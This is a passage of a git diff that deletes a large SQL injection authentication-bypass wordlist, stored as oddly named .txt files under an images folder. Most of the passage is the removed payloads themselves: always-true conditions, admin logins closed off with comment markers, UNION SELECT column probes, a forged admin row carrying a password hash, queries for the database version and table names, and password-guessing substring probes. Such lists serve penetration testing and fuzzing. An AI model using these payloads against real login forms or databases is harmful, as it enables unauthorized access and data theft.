-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
